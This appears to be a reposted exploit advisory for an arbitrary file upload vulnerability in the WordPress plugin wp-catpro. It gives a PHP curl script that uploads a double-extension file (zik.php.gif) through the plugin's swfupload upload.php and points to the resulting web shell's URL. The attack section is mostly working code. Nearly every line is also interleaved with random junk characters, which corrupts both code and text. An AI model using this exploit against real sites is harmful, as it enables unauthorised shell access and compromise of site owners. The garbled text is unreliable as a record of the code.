Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
. [) s) N' H8 k5 r* U+ R#-----------------------------------------------------------------------3 n2 h- b3 |3 M3 [. I& G
- Y% j- q4 I# u% y
作者 => Zikou-160 D9 B0 F2 y' U
邮箱 => zikou16x@gmail.com0 d& P% ^, U9 I( z( w- I J
测试系统 : Windows 7 , Backtrack 5r3( ? f, {6 Z8 P7 ~
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip4 a7 I9 i/ {2 m! @
####
/ O A, n) m! m' b " I5 [6 E7 H( Y9 j! O D
#=> Exploit 信息:. o( f/ Q" R3 n" |* I; a5 Q
------------------
) _% R* @/ r Z: E# 攻击者可以上传 file/shell.php.gif% G; ?6 b! ^3 c7 V
# ("jpg", "gif", "png") // Allowed file extensions
( |3 Z- J# i3 g: M6 r# m: X7 Z# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
6 b+ ?5 y W/ G5 L) ~+ C% y6 b# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
" Y. \9 P0 w8 I1 u) l------------------
1 |0 h3 R0 R, R) Z8 R 3 y2 ^8 I$ S+ t' ~; P! w
#=> Exploit
& B) P8 }* y _" y' r3 b( X-----------, v$ J" q# e& I( ?8 a
<?php
" X2 a7 h. l/ d& y( x0 w, x 3 a0 ?$ y5 E+ R. ^- y
$uploadfile="zik.php.gif";8 j3 Z% _/ ?, y, L& S8 p
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
8 @. K3 D* w: q) e% ocurl_setopt($ch, CURLOPT_POST, true);
8 Y+ S* o& p6 H$ ]! hcurl_setopt($ch, CURLOPT_POSTFIELDS,
! x/ ] g, I+ O h: A8 e* farray('Filedata'=>"@$uploadfile",/ x3 o0 ~: C: z0 ~
'folder'=>'/wp-content/uploads/catpro/'));$ [' ^5 X3 C. T+ a1 w9 J6 f0 V
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1 \8 E: i. u) o; \7 i$ r0 e4 o$postResult = curl_exec($ch);
/ I: X5 C6 O3 g% ~curl_close($ch);
/ V" s% o% A7 Y7 D/ L! K; V
3 W1 s% P8 N& b( q& J8 N. cprint "$postResult";
# D7 ]) ?( S! ?1 `
! u" V. ^1 L- TShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif" P8 h4 r8 s. T7 ]3 v+ P
?>& h0 m$ g5 W7 Q; z2 W
<?php: {; d7 Q! n; v6 W
phpinfo();
2 Q' H' B! u4 |3 j: o+ G?> |